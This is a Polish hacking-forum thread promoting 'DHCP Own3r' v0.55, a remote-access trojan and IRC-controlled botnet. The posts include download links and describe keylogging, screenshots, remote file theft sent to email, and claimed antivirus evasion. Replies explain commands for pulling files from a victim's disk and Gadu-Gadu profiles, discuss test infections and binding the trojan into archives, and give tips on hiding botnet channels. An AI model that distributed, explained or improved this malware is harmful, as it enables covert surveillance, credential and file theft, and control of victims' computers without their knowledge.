DHCP Own3r [beta] - Nowe narzedzie zdalnej administracji

drgiro

Użytkownik
Dołączył
Lipiec 31, 2006
Posty
8
Serdecznie Witam w obiecanej kolejnej odslonie prorgramu autorstwa DRGIRO: DHCP OWn3r v.0.55

Aktualna wersja 0.55

Uwaga !!
Kod:
Jest to wersja beta 0.55 , co oznacza ze projekt nad nim ciagle trwa .

Jesli zauwazyles blad , w dzialaniu programu , chcesz ciekawych funkcji

( napisz jakich ) , masz uwage , to wlasnie to jest odpowiednie miejsce aby 

cos zasugerowac!

Krotki Opis programu :
1.Siec Botnet - z ofiar mozesz stworzyc siec komuterow ktora moze jednoczesnie interpretowac te same polecenia ( zastanow sie gdzie to znajdziesz ? ) , nad siecia masz dostep tylko TY. Bot posiada specjalne polecenia ktore pozwalaja na zarzadzenie ta siecia. Do kazdego komputera z Botnet'u masz bezposredni dostep.Majac np. 100 komputerow w sieci mozesz przy pomocy jednego polecenia : zrobic 100 printscreenow , pobrac 100 plikow , pobrac 100 logow itp itd.

2.* Nie trzeba znac IP - po 2 minutach Twoj bot ( komputer ofiary sam sie do Ciebie zglasza) laczy sie na botnet'em i jest gotowy do odbioru polecen. Wszelkie pliki , screeny , wysylane sa na mail'a , dzieki temu unikamy koniecznosci posiadania p2p.

3.Syntezator mowy - tak dhcp owner potrafi mowic ! Korzysta przy tym z Syntalka.
4.Niewykrywalnosc - im nowszy wirus tym gorsza wykrywalnosc .
5.Uniwersalnosc - Botem mozesz sterowac z poziomu Linuxa , Unixa , czy nawet Telefonu komorkowego ! - konieczne jest posiadanie tylko telefonu z java i gprs badz wap.
6.I wiele , wiele innych funkcji ...


Program sklada sie z :
- klient - ofiara ( w tradycyjnych trojanach to server ) - DHCP Own3r
- klient - master ( Ty ) - Klient sieci IrcNET - koniecznie poznan.ircnet.pl

Linki :
~~~~
*Film Instrukarzowy - http://www.youtube.com/watch?v=wO5sf3yWIIw
*DHCP Owner :
1) http://www.sendspace.com/file/mxctz8
2) http://fs07n5.sendspace.com/dl/28ff7c135a0.../DHCP_Own3r.rar
*Mirc ( preferowany klient irc )
http://www.download.net.pl/189/mIRC/
*Screeny :
Generator :


Piszcie komentarze , uwagi , informacje o bledach itp itd
 

terminator934

Użytkownik
Dołączył
Marzec 5, 2008
Posty
49
Troszkę chaotycznie nagrany TUTEk ale zabieramy się do testów. ;]

Powiedz jeszcze jak to się usuwa.
 

drgiro

Użytkownik
Dołączył
Lipiec 31, 2006
Posty
8
Wpisujesz polecenie uninstall ( po wykonaniu polecenia bedzie jeszcze w pamieci )i na nastepne wlaczenie komputere juz go nie ma w pamieci. Jesli chcesz zeby od razu wyszedl z pamieci po deinstalacji , wpisujesz peace.
 

terminator934

Użytkownik
Dołączył
Marzec 5, 2008
Posty
49
Sprawdzałem to około 3 anty viry wykrywają. Może i więcej.

Zgłaszam odrazu wady trojana:
narazie tylko jedna wada.

Włączam IRC-a na kompie1, po czym odpalam kompa2 gdzie zainstalowałem serwer
to zanim zainfekowany komp pojawi się na IRC-u to mija około 2-5 min przynajmniej u mnie.

Probował ktoś to zbindować z jakimś archiwum .rar ?

kolejna wada jak przychodzą logi to są w rozszerzeniu .zrt trzeba zmieniać na .txt
 

drgiro

Użytkownik
Dołączył
Lipiec 31, 2006
Posty
8
naturalnie , w przypadku wiekszych projektow przed heurystyka nie ma ratunku .

2 minuty to optymalny czas podtrzymywania polaczenia , tak aby server nie zostal wyrzucony , w przypadku przeciazenia , badz nieaktywnosci .
Jesli chcesz zwiekszyc czas odstepu wpisujesz polecenie :

Kod:
 czas 6
gdzie 6 to np. ilosc minut odstepu .
 

terminator934

Użytkownik
Dołączył
Marzec 5, 2008
Posty
49
Kolejną opcją jaką mógłbyś dodać to wygląd logów.

Przychodzi plik. Gdzie otwierasz i masz pełno [Left Mouse Button]. I co jakiś czas literki które dana osoba wpisywała.

Przy następnym upie spróbuj zrobić tak jak jest w BPK.
Masz dany program lub strona www i pod tym co zostało wpisane.

Screen bardzo ładny przychodzi można wszystko odczytać.

Możesz wyjaśnić na forum jak użyć funkcji ściągania danego pliku z kompa ofiary ?
wpisuje się "get xxxx" i co po get ?

Ogólnie nawet fajny w obsłudze ten trojan ;]
 

drgiro

Użytkownik
Dołączył
Lipiec 31, 2006
Posty
8
GET Lokalizacja do pliku - pobieranie plikow


Gdzie lokalizacja do pliku to maska do :

pobierania wielu plikow np.
Kod:
get *.jpg - pobiera wszystkie pliki .jpg
pobierania jednego pliku
Kod:
get x.jpg
Kod:
 get C:Windowswin.ini - pobiera plik win.ini z katalogu Windows

W przypadku gdy nie podales lokalizacji , to pobiera z aktualnego folderu ( z folderow przechodzisz poleceniem cd Folder ). Domyslny folder startowy to dysk C:
Jesli chcesz przejsc na np. dysk E: to uzywasz polecenia cd E: .
Jesli nie jestes pewien gdzie sie znajdujesz wpisujesz polecenie gdzie
Przjescie do katalogu profilu aktualnie zalogowanego uzytkownika : user.
Przjescie do folderu Moich Dokumentow : dok.
Przjescie do profilow Gadu-Gadu uzytkownika : gygy

Jesli chcesz wiedziec co znajduje sie w folderze w ktorym aktualnie przebywasz to wpisujesz
Kod:
dir *.* - wszystkie pliki

dir *.txt - pliki tekstowe itp

Odpowiedzi wysyla na mail'a.


Zachecam do zglebienia sie w plik polecenia.txt - polecen jest duzo ( sa pomyslowe ) , a w razie watpliwosci prosze pisac przez informator w DHCP Own3rze , badz na forum.

W nastepnej wersji postaram sie wprowadzic bardziej estetyczny wyglad logow klawiatury.
 

terminator934

Użytkownik
Dołączył
Marzec 5, 2008
Posty
49
Wiem czytałem plik "polecenia" ale właśnie chodziło mi o to jak z tą lokalizacja bo nie jest dokładnie napisane.
 

D0han

Były Moderator
Dołączył
Lipiec 27, 2005
Posty
975
Komunikacja przez IRC a pliki i wyniki poleceń na maila? Wiesz co to DCC?
Poza tym, uważasz że trzymanie botów na polnecie będzie niezauważone?
<
 

drgiro

Użytkownik
Dołączył
Lipiec 31, 2006
Posty
8
dcc w botnecie nie jest dobrym pomyslem , tak samo jak ustalanie chmodow przez ftp o_O

1.http://www.irchelp.org/irchelp/rfc/dccspec.html - tutaj sie dowiesz dlaczego dcc w bocie nie jest dobrym pomyslem - specyfikacja dcc.

A z mojej perspektywy wyglada to nastepujaca :

2.inicjizacja wymaga obecnosci botmaster'a . U mnie wpisujesz polecenie , i od razu mozesz
wylaczyc komputer , a jestes pewien ze pliki dojda.

3.pobieranie plikow ze 10 botow jednoczesnie ? nie wydaje mi sie to dobrym pomyslem.
Ze wzg. na :
- ograniczenia transferu ,
- kloci sie to z architektura tego projektu
- brak wybierania selektywnego . U mnie wchodzisz na poczte , i widzisz naglowki
wiadomosci - klikajac na naglowek pobierasz cala wiadomosc to Ty decydujesz ktora chcesz sprawdzic
- backup na poczcie.

Kod:
 Wyniki nie wszystkich polecen wysylane sa na poczte , tylko tych do pobierania plikow , screenow itp.  W naglowku wiadomosci masz czysto napisane :  POLECENIE NickBoTa : DATA GODZINA - jest to klarowne rozwiazanie
D0han , na poczatku rozwazalem mozliwosci dostarczenia dostarczenia plikow przez poczte polska s.a , ale biorac pod uwage ich slamazarnosc , i ostatnie strajki te rozwiazanie nie wchodzi w gre.
 

D0han

Były Moderator
Dołączył
Lipiec 27, 2005
Posty
975
Mhm, chyba że dokładnie takie miałeś założenia. A specyfikacje DCC znam, tak jak i IRC.
Ale nadal nie odpowiedziałeś na pytanie o polnet.
Jak już zalecasz trzymanie bnetów na ircu, to chociaż mógłbyś wytłumaczyć że warto dać +s na kanał, albo nawet dopisać obsługę +k.
 

robak06

Użytkownik
Dołączył
Kwiecień 14, 2008
Posty
1
Lepiej byłoby gdyby można było wybrać poprzez konfigurator jeszcze serwer na którym zostanie stworzone sieć i po jakim czasie bot dołączy do kanału.
 
Do góry Bottom